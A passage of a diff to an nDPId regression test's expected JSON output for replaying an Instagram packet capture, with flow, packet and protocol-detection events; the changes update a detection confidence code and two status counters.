eKmgreaCCmgg7uEVJBFpoIqbJxUnCLu4QeTiZpSHB3cGdOqZ3QRk7jdJJupIE7IbunTdJ01OMhpJ0O7ON3aSOfwekxeD0uW5b1DncnTsA9NJjtugMD53fqZhIgWgSaAtbEsWQtyzLPTnJhkzlli0uis5Bw7O7irEdfDm7Q3o5VwFjvEUYqlhUYWiOMp6HN4L9xoRfHbOtZDzdIqnt5UkurlUXoRcsXKR16897uavZ1aZJAySBM7AzpAoyQRQgyWmsrLZ1OZUcAMdHNE+Pr4jXWjcf5Yn6n5BjRjQdkY2Ci0j2KtwOa\/UpM3ThJRs3xi0n0mLpwZpOEVJkou7MSd02Z3ZFpOEHkgZ06GTuOLuhNJONJONnSQ6khpJwSdxp0k3SkN0kh3Zxu7STU1Wnghs\/P2jYmxyVZaPV5dg9EEcFEMbREli20VTekwDSyB3KDNbYk3lNtwDNIYAe3by0E+sjys0+hryZgbUO7JtFhyPAtU9x0fnXT5Pe0s8iDQmLcK2RFHXhU6XTyJnQ28l6vzLNitasqL77zvTx19X0ci6zQXnPPdfP7MvnHFT+lsL59dHsm\/89emZV6Rwnnza5jdZxo6r1zovBcxn0zk+Fuz0rN88YOj54WAHVCQZESpRo6asDUEg+pcTzW\/zOv0wrwT2tqjD9I4GWD0GFZpn3V3jttz7jDCvpQgFzWGnoul5+tsu35+PE65+
hGeTZlT7uR8ydJvn72\/jvpsaaqz69ctVZ2lpLKT0oqTAk8hxUkhJOCdONJONpJwUoyTdncE6dNSUk25Pb4401KwD+XrjwXoWViQow+4a5bP6vJ0nnR9YKwCs6sKb6awPu58RHXNxxs1uwH0ZoswO2Gbbm0i2IA2jMsDvRdUaULFs2KwzolWtLXv2s7q0nGSLJCq2zNhzG32cRjcZ5mHvkvmnpYZ\/G44avfLzN1IbE7nlky\/T\/MstLZrG1W\/PSfZOu5d\/ArvpDw\/t5uJCKz6NPKChFXSGiq1p59mmZDDhAbKIjC40UhbGFKqLSdOLO4MkkfQh1cJjj+O9GqqPQOf5vU87txCsYGo7vZ879onVefdz8yDmjOv7+Tz\/pFy8v0="} 02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1436720942592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAJAADkG3jFSVRqiwKgAZwBQ4sRSEFIWL7VmbIAQAghpXgAAAQEIClYL0tgAA\/vKkxiut5qB26Ow9Pj8+yfWMCa4DUGy+Ho3+c5jmKfpvReNdKH0EH5lbcbz+eZjXvWt849W37RLwLcqfYn89ApepLzJrn01eX8qj3x\/Byg9vl4hMftksS8eq4V9yQ9dg87nd3j8t6NPn9HZ78M8\/m15\/SI4iV0+Hr5YZdJFWiriRaANGqKgC2yBU5D1y9AGO5LwC+hZAOnTCa0b8GSfSXc3ZK6AUI8M2\/RlL0N3AaXqkYlae70WFvXE\/MysjfHhicTX059\/nyudDYrqom8O\/SwbXeAYWCl2HDbeHOmh0nFvU+hbHnPQ5vucrmudw17ngsyPVk8VHSYNOA4HAkiaZ9LkB4VlFV6oQoQoqHF7YpwjYwQuo3UsJOh\/RGPbfOPDFikaxDY4DU5OkkXmo2bPofj3YqtI3A2tMe8H5Nt8O55y1B5\/7N5\/Hj7N63x3O1z+g38A6wXb+eEc9NDyaVW6IJldX6R5B6ZmuRoJAaDtPubZt\/FrO\/ofNxI07nn+e9Kt8ed1WPUA43vniOOoe+MdtjoYlp8vJuziWF9ZSfTEwvQuT1MrucEnl3NmPfozec2Q8b4rocvm7XZ0ZulcvKtUOGRAQ4+gnWZDVgPNWhEKtHOpze6ZyDRXdX8BKT0GfAkRXbz40uX19WJqIDO0OmFTszkplJub3z+cPQ\/JvQ6z862sGNz1mVnCXPSY4Ty9OzHqpGSzpKihVIIPNmVKcRNOqLCYDILVVeEY398LgV1vOVI9RE0wT4QEQJpSDAaZU3nNoOD251yCtoLfS5daqb9QCMzcp43dzem6ufhS6Oew6aI6IVlfacgTJtbFeleWXZh0ue8o8\/FVehcsDozfPVyqd2beAaLdw7AEWuPBsy\/NtRo7nK6amwzE7wely5\/Li6bHG7EM3mel42aI9A86edPRMPG0Ly9C4IXGVdSXyWneZ42VsFYuj6kTogdbNyRn62pnUvPuruzMr3A+oweXcoviYt9jgW6815zm+k8\/tAB\/OBUuybA1gvm903GUlLnZS6ZF4KFr24FYdVfxNcHoN\/nFir0ejjdiS\/RN6WHm6VtwnvhPbN\/CPbfkffMXtuX3qjh3relJQiEoMQKEpOyKasJqDId
1NjV21hXC6QDvdJEJVO1s\/Q\/zN6OTm8v3oOGonI9l57alQUrkXYpZMcsGthFgcg05VXIYrOJRhIhUfQ\/A63I8zG3eKzunHr8oC2NDAbQaOkGxtKX2WhycdMdrn93jLkKuKz3vZ9JmVLTQZa3BEZ0bqBxVlISUosM18C1LstzjfR8zjgcXvgyeor56XydIvT6GCMTACyMtUrgCKhlE19BSC9tDF2gkO5dOOJom5fPt2VnLbnJsVlaDDEPHHuS8fSny7ebZ3qPK2w9TgzU+rEx8ulpAaNFzDbyos643zk7Ou5p5O+X0FYusqEnp3Q6dbPtiuk0uU14ejc98q24cupIjGzSHlDhtF575ZOO+XSVH4SnEqKawNGGtZiJmIRtjEC5UnTQtnUn51xEfWfPtM8B7b2wbSKwHWlcGMSfEWVosImWLXNObHxqcs3YBBYOiCN6LkB4epBLK0KLAqqCHVFoZN\/S\/La3Ded0EcjPZ3z3AN\/GxrIy9iG8YgvWH1PnkuwzLWQPtqlhubqs540iAhZVVsNHpgy+LaCMldVgpipyGjRNCQdSLo8zK5\/dN6RMPzzXjRmF7eCA9vW05aci1898xYkdUwXtNbK2ik7MtyrTKySLWrnk2azz+9hky9fQzRuXXXQYOOm8sLU6Mz+T6DMig+c38yaBw+rLTxauj59VjG6rUoWWXRciQb8rJMP0s6wZdhrOeI1OpspY+oXQgyBjtBm3CyFWZNgavivsvzz15cAGTDTH0Hz\/1jzPKsrUpltBIzz0jO0ZWIpZqARY="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720950909,"flow_last_seen":1436720950909,"flow_idle_time":7580000,"flow_min_l4_payload_len":1398,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1398,"flow_avg_l4_payload_len":1398,"midstream":1,"thread_ts_msec":1436720950909,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -149,23 +148,23 @@ 02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1436720952555,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952555,"pkt":"QPMIw47hABsv8H60CABFAAW+RXZAADMGTWsCFuwzwKgAZwBQrHcqB6BM6nVWeIAQAeZ8mQAAAQEICmBlKDgAA\/+vtV20fc9mrp1dM1zdmjppSPVtJK34O3VnVq0beVF65xNDXtnFMscw0gMAAAA0IoJBUBRFARUHcs5g82pbGbtawVs6OSKR1bUyvV0dTgqje3NxuXVMt1wlAegfPgme8KPvNkyz2Nzpho206rca8VQBcVDdd9H2q16p8Xe1\/FGG0PnMFm95yjbzbc7y6uXqTNGzWHDjlr1zbmh3aAiPRz9FJQBKIrBUUFyxyAyxUMbqpW7M7s+HSqN8+tay6O9jTtj28wUzIo\/I9c7sc2SRY7SGir2ou5wYpBHamL2VXdh1GOfOiG2KSWK0ZRWURgMc8c2dLwzO6PYryxPPJ14tXbyVLEzu7AiS6csbmt9Otxqax6NG+4uWLSiIMYORwY5GrXsyVyji63ZEef2CRuZlT9tVLFa7rpa4rN2GvKa6elt72n7oBKscxMtLQoy7qN1yh+eGrfONLhtDQAwAAEA0gCRQARQaoCLnm9fzqjnZ3VrTw09XILe19+jPTt59nHFRbU0OOuNydnD0UHny+qEQy39QN7UThl7edlc1nfdBowRUELhmGc+r+yWewvFPtPxXnpDZ1BZmRK8zLPQ38W8W\/X1YhH8M9eufC2d\/AOI79G+kqiNKqKAqKC5YqC5IoY3XSd0Z3Y8akkew1rnv4HkTku3FOmJHHJJtncsjjclx1kPn70JQGkcLY6tNQ0zKJTVjWvXtSZIzLIrSwjEmjQ8c8c2dDq1OqPYLu39fJ1betucGQOPuDRUSXa1cLIpt3N2mddd7Y5VNmsbw2Da2\/vbQiUjZHiNOuRQ2ZSRqRNXXUTanbbp9PbdNN2jY6tLkwRT\/ANjbmOa9UE6Uotjv45c4hUhaamqOkXoyhy4okgDYACCgaABAAIoAADuWUw2fta4zKI7NJxuGVLi29HLne+NvcdlxB1aHHXK2+xtdVSUBfVAg1XrRV5tTjh624ct8i+wPNScORUqMc8Mwy9A0D69VT7xd7V8U53E5jD5vecyw6sYrVuz2BjjtWSJ8nbzbRwtr0xDjG\/RvaURWshFABQXLDMBUUMbnpi4stLLjsnZ8NankEdmWkdab9Muk5DH3nTO4pEwOWG8yo2aQrXLjZXdiuNM0hcyDVu59yGWKyiLXOcZkMeVY7MM2dDs0OqPZPZydXJ159bc5NQmJyqJ1n3Y9HE20x57YdM68dmx\/qZ\/xubZFscff4rR1u4z59Nv1lM66iJZ3x2S6YP1M3XSpWVsVDbdy6xp4Yopxy1ire9NXUDdH5QwofuPrbhV5y8si6MKyVFHiAwABRANQgJRFAEAFRQtucQmaM4mXub5p95Oznuefj688r5I9Io3NRJy4pPrlN+ht2Ku6h\/QXn5ptuulbZCyuVgkTcvo6\/Kxzrz2meGueGWOSOn3F4n9xzTh4w9X+ac6rWdQ67Ljk1S7rhwtJ3i1X+cw4WoLju5KMI5Io4ONbtW2kog1kACqiguWGYCooYz6ATTO7t5HXhw1qebQF2
qZdp0cidTv0Xe9srme4048++yBSFg0z42SRtNxxS2IytrHPX1Ij8Vk7Fa5o\/JWGa5s9+xmDrx9qPYDw1O\/L1a89e2KisZlDBefSxSPipRRjkzbpFVvfK43E7weGqLi0clcfofITO4hnvIobM4rryyF2jrvNWRSt60dFarYqu52R3e5aM9G\/a4brng6ZBkiCt702S5fDbSrWoq\/NToyhaKjMRAFBAUANYAkUAEUBFQHbM3h00ta4zJY\/J3bGvNV08O1ZZGZNGYqLS2JzrXKQObG9Rfd54v2gqlsvGjrpY\/dvL3jmUMnMFz0834bMNsda54g8+w\/HfreHt8+XvQ8OvrspC67h\/dIPKIblw4peerNFqYI1OTSaIwPLKqjmzXmxQGlXFQVcVBVxyBVxUM4="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAABZAuBAAEAGAfDAqABnLiFGn+VCAbsSlgM32Tfr4YAYA4n5fAAAAQEICgAD\/7VWGIoUFQMBACAs4KplPbzXnvu9o5LJf4SK8seDxrub6gsxIshtI3HaOA=="} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAAA0AuFAAEAGAhTAqABnLiFGn+VCAbsSlgNc2Tfr4YARA4k19gAAAQEICgAD\/7VWGIoU"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1436720952563,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1436720952563,"pkt":"ABsv8H60QPMIw47hCABFAABH\/7VAAEARadHAqABnCAgICGn0ADUAM87BrqQBAAABAAAAAAAACHBob3Rvcy1iAmFrCWluc3RhZ3JhbQNjb20AAAEAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"photos-b.ak.instagram.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"photos-b.ak.instagram.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720952611,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1436720952611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720952611,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC\/YuIUaWwKgAZwBQn5dVkK9h7WtuhaASOJDXwwAAAgQFlgQCCAoJIvhRAAP\/swEDAwU="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1436720952611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952611,"pkt":"ABsv8H60QPMIw47hCABFAAA0kThAAEAGc8XAqABnLiFGlp+XAFDta26FVZCvYoAQAOU17QAAAQEICgAD\/7oJIvhR"} -00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":745,"packets-processed":743,"total-skipped-flows":0,"total-l4-payload-len":515476,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":27,"total-detection-updates":16,"total-updates":0,"current-active-flows":32,"total-active-flows":32,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":162,"global_ts_msec":1568796253770} +00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":745,"packets-processed":743,"total-skipped-flows":0,"total-l4-payload-len":515476,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":27,"total-detection-updates":15,"total-updates":0,"current-active-flows":32,"total-active-flows":32,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":161,"global_ts_msec":1568796253770} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796253770,"flow_last_seen":1568796253770,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1568796253770,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796253770,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDLAbuZigajAAAAALAC\/\/8cPAAAAgQFtAEDAwYBAQgKDXByoQAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1568796253782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796253782,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wMv1rwrBmYoGpKASbHB3qgAAAgQFeAQCCAo6Lg6wDXByoQEDAwg="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1568796253784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796253784,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDLAbuZigak9a8KwoAQCAwKkgAAAQEICg1wcq86Lg6w"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254514,"flow_last_seen":1568796254514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254514,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1568796254514,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254514,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDNAbsBxqpOAAAAALAC\/\/8NqAAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"} 